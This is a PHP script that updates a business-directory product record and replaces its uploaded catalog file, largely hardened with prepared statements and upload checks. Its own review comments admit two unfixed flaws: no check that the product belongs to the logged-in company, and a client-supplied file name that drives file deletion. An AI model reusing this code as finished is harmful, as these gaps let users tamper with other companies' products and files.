
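<?php
/**
 * Saves edits to an existing product row in `busdir_product` and, when a new
 * catalog file is uploaded, stores it under uploads/products/ and points both
 * `busdir_product.catlog` and the matching `busdir_product_photo` row at it.
 *
 * Input:  POST fields product_id, product_name, my_company_id, price,
 *         currency_id, discounted_price, description, textBox, catid,
 *         subcatid, keyword, old_catlog; optional file field "catlog".
 * Output: the plain-text body "success" or an error message.
 *
 * Every request value is untrusted, so all SQL goes through prepared
 * statements and the uploaded file is renamed and type-checked before it is
 * written to the web-accessible upload directory.
 */
error_reporting(0);
session_start();
include("db/conn.php");

// header() only queues the redirect; without exit the rest of the script
// would still run for an unauthenticated request.
if (!isset($_SESSION['company_id']) || !isset($_SESSION['company_name'])) {
    session_destroy();
    header("location:login.php");
    exit;
}
if (!isset($_SESSION['loggedin_user'])
    || !in_array($_SESSION['loggedin_user'], array('admin', 'company'), true)) {
    header("location:404.php");
    exit;
}

// Returns a POST field as a string; missing or array-valued fields become ''.
$post = function ($key) {
    return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
};

// Runs one parameterized statement on $connection (mysqli or PDO, whichever
// db/conn.php provides) and returns true on success, false otherwise.
$runUpdate = function ($connection, $sql, array $params) {
    $stmt = $connection->prepare($sql);
    if (!$stmt) {
        return false;
    }
    if ($stmt instanceof PDOStatement) {
        return $stmt->execute(array_values($params));
    }
    // mysqli: bind_param() takes its values by reference.
    $bindArgs = array(str_repeat('s', count($params)));
    foreach ($params as $i => $unused) {
        $bindArgs[] = &$params[$i];
    }
    call_user_func_array(array($stmt, 'bind_param'), $bindArgs);
    return $stmt->execute();
};

// product_id is used as a row key in every statement; accept digits only.
$pid = trim($post('product_id'));
if (!ctype_digit($pid)) {
    echo "An unknown error occured. Please try again.";
    exit;
}

$textBox     = htmlentities(trim($post('textBox')), ENT_QUOTES);
$description = htmlentities(trim($post('description')), ENT_QUOTES);

// Strip e-mail addresses, phone-number-like digit runs and URLs from the
// free-text fields before they are stored.
$patterns = array(
    '/([a-zA-Z0-9_\-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)/',
    '/([0-9]+[\- ]?[0-9]{9}+)/',
    '/([0-9]{2,}-[0-9]{0,}-[0-9]{0,})/',
    "/(http|https|ftp|ftps)\:\/\/[a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,3}(\/\S*)?/",
);
$description = preg_replace($patterns, '', $description);
$offer_des   = preg_replace($patterns, '', $textBox);

$product_name     = $post('product_name');
$my_company_id    = $post('my_company_id');
$price            = $post('price');
$currency_id      = $post('currency_id');
$discounted_price = $post('discounted_price');
$catid            = $post('catid');
$subcatid         = $post('subcatid');
$keyword          = $post('keyword');
$offer_flg        = ($offer_des != '') ? 1 : 0;

// basename() keeps the client-supplied name inside uploads/products/.
// NOTE(review): the name still comes from the client; reading the current
// `catlog` value from the product row instead would limit the delete below to
// this product's own file.
$oldCatlog = basename($post('old_catlog'));

if (!empty($_FILES["catlog"]["name"])) {
    $uploadError = isset($_FILES["catlog"]["error"]) ? $_FILES["catlog"]["error"] : UPLOAD_ERR_NO_FILE;
    if ($uploadError === UPLOAD_ERR_INI_SIZE || $uploadError === UPLOAD_ERR_FORM_SIZE
        || $_FILES["catlog"]['size'] >= 2 * 1024 * 1024) {
        echo "Image size error. Max size is 2 MB.";
        exit;
    }
    if ($uploadError !== UPLOAD_ERR_OK) {
        echo "An unknown error occured. Please try again.";
        exit;
    }

    // Only known document/image extensions may land in the web-served upload
    // directory; anything else (notably server-side script extensions) is refused.
    // NOTE(review): the allowed set is an assumption - confirm which catalog
    // formats the site supports. Checking the content type (finfo) and
    // disabling script execution in uploads/ would add further protection.
    $allowedExt = array('jpg', 'jpeg', 'png', 'gif', 'pdf');
    $origName   = basename($_FILES["catlog"]["name"]);
    $ext        = strtolower(pathinfo($origName, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        echo "Invalid file type.";
        exit;
    }

    // Rebuild the stored name so it has exactly one extension and no
    // characters outside [A-Za-z0-9_-]; the path is derived from the same
    // $cat so the file name and the database value cannot drift apart.
    $stem       = preg_replace('/[^A-Za-z0-9_-]+/', '_', pathinfo($origName, PATHINFO_FILENAME));
    $cat        = time() . "_" . $stem . "." . $ext;
    $catlogpath = "uploads/products/" . $cat;

    // Store the new file first; the old one is removed only once that worked.
    if (!move_uploaded_file($_FILES["catlog"]["tmp_name"], $catlogpath)) {
        echo "An unknown error occured. Please try again.";
        exit;
    }
    if ($oldCatlog !== '' && is_file("uploads/products/" . $oldCatlog)) {
        unlink("uploads/products/" . $oldCatlog);
    }

    $runUpdate(
        $connection,
        "UPDATE busdir_product SET `catlog`=? WHERE product_id=?",
        array($cat, $pid)
    );
    $runUpdate(
        $connection,
        "UPDATE busdir_product_photo SET `photo_path`=? WHERE product_id=? and mycatlog='y'",
        array($cat, $pid)
    );
} else {
    $cat = $oldCatlog;
    $runUpdate(
        $connection,
        "UPDATE busdir_product SET `catlog`=? WHERE product_id=?",
        array($cat, $pid)
    );
}

// NOTE(review): every UPDATE here matches on product_id alone and this one
// also rewrites company_id to the session's company, so nothing visible in
// this file ties the product to the logged-in company. Confirm how company_id
// is populated and add an ownership predicate for the 'company' role.
$updateq = "UPDATE `busdir_product` SET
                `product_name`=?,
                `price`=?,
                `currency`=?,
                `my_company_id`=?,
                `discounted_price`=?,
                `description`=?,
                `offer_flg`=?,
                `offer_des`=?,
                `keyword`=?,
                `catid`=?,
                `subcatid`=?,
                `company_id`=?,
                `active`='y',
                `modifiedby`=?
            WHERE `product_id`=?";
$updater = $runUpdate($connection, $updateq, array(
    $product_name,
    $price,
    $currency_id,
    $my_company_id,
    $discounted_price,
    $description,
    $offer_flg,
    $offer_des,
    $keyword,
    $catid,
    $subcatid,
    $_SESSION['company_id'],
    $_SESSION['company_id'],
    $pid,
));

if ($updater) {
    echo "success";
} else {
    echo "An unknown error occured. Please try again.";
}

?>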
